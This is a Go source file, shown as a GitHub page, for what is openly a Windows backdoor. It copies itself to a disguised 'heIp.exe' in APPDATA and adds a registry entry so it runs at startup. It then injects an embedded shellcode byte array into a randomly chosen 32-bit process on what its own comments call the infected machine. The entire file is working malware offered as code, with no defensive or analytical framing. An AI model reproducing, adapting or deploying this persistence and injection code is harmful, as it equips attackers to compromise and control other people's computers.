-
Notifications
You must be signed in to change notification settings - Fork 17
/
Copy pathmain.go
62 lines (58 loc) · 2.75 KB
/
main.go
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
package main
import (
"log"
"math/rand"
"os"
"GOback/actions"
"GOback/helpers"
"time"
)
func main(){
time.Sleep(60*time.Second) //Program should wait some amount of time till windows open completely
exePath, _ := os.Executable()
destinationPath := os.Getenv("APPDATA")
destinationPath += "\\heIp.exe"
_, err := os.Stat(destinationPath)
if os.IsNotExist(err) {
_, err := helpers.CopyFile(exePath, destinationPath)
if err != nil {
log.Fatal(err)
}
helpers.AddRegistery(destinationPath)
} else {
if helpers.CheckRegistery() != nil {
helpers.AddRegistery(destinationPath)
}
}
rand.Seed(time.Now().UnixNano())
pidArray := actions.GetAllProcesses() // In this line, 32 bit processes' pids in infected machine is obtained as array.
if len(pidArray) != 0 {
targetPid := rand.Intn(len(pidArray)) // Random process is selecting for injection.
shellcode := []byte{
0xb8,0x71,0xb3,0xd2,0xe3,0xdd,0xc1,0xd9,0x74,0x24,0xf4,0x5d,0x2b,0xc9,0xb1,
0x52,0x83,0xed,0xfc,0x31,0x45,0x0e,0x03,0x34,0xbd,0x30,0x16,0x4a,0x29,0x36,
0xd9,0xb2,0xaa,0x57,0x53,0x57,0x9b,0x57,0x07,0x1c,0x8c,0x67,0x43,0x70,0x21,
0x03,0x01,0x60,0xb2,0x61,0x8e,0x87,0x73,0xcf,0xe8,0xa6,0x84,0x7c,0xc8,0xa9,
0x06,0x7f,0x1d,0x09,0x36,0xb0,0x50,0x48,0x7f,0xad,0x99,0x18,0x28,0xb9,0x0c,
0x8c,0x5d,0xf7,0x8c,0x27,0x2d,0x19,0x95,0xd4,0xe6,0x18,0xb4,0x4b,0x7c,0x43,
0x16,0x6a,0x51,0xff,0x1f,0x74,0xb6,0x3a,0xe9,0x0f,0x0c,0xb0,0xe8,0xd9,0x5c,
0x39,0x46,0x24,0x51,0xc8,0x96,0x61,0x56,0x33,0xed,0x9b,0xa4,0xce,0xf6,0x58,
0xd6,0x14,0x72,0x7a,0x70,0xde,0x24,0xa6,0x80,0x33,0xb2,0x2d,0x8e,0xf8,0xb0,
0x69,0x93,0xff,0x15,0x02,0xaf,0x74,0x98,0xc4,0x39,0xce,0xbf,0xc0,0x62,0x94,
0xde,0x51,0xcf,0x7b,0xde,0x81,0xb0,0x24,0x7a,0xca,0x5d,0x30,0xf7,0x91,0x09,
0xf5,0x3a,0x29,0xca,0x91,0x4d,0x5a,0xf8,0x3e,0xe6,0xf4,0xb0,0xb7,0x20,0x03,
0xb6,0xed,0x95,0x9b,0x49,0x0e,0xe6,0xb2,0x8d,0x5a,0xb6,0xac,0x24,0xe3,0x5d,
0x2c,0xc8,0x36,0xf1,0x7c,0x66,0xe9,0xb2,0x2c,0xc6,0x59,0x5b,0x26,0xc9,0x86,
0x7b,0x49,0x03,0xaf,0x16,0xb0,0xc4,0x10,0x4e,0x28,0xb1,0xf9,0x8d,0x4c,0xbf,
0x54,0x18,0xaa,0xd5,0xb6,0x4d,0x65,0x42,0x2e,0xd4,0xfd,0xf3,0xaf,0xc2,0x78,
0x33,0x3b,0xe1,0x7d,0xfa,0xcc,0x8c,0x6d,0x6b,0x3d,0xdb,0xcf,0x3a,0x42,0xf1,
0x67,0xa0,0xd1,0x9e,0x77,0xaf,0xc9,0x08,0x20,0xf8,0x3c,0x41,0xa4,0x14,0x66,
0xfb,0xda,0xe4,0xfe,0xc4,0x5e,0x33,0xc3,0xcb,0x5f,0xb6,0x7f,0xe8,0x4f,0x0e,
0x7f,0xb4,0x3b,0xde,0xd6,0x62,0x95,0x98,0x80,0xc4,0x4f,0x73,0x7e,0x8f,0x07,
0x02,0x4c,0x10,0x51,0x0b,0x99,0xe6,0xbd,0xba,0x74,0xbf,0xc2,0x73,0x11,0x37,
0xbb,0x69,0x81,0xb8,0x16,0x2a,0xb1,0xf2,0x3a,0x1b,0x5a,0x5b,0xaf,0x19,0x07,
0x5c,0x1a,0x5d,0x3e,0xdf,0xae,0x1e,0xc5,0xff,0xdb,0x1b,0x81,0x47,0x30,0x56,
0x9a,0x2d,0x36,0xc5,0x9b,0x67 }
actions.InjectShellCode(shellcode, pidArray[targetPid])
}
}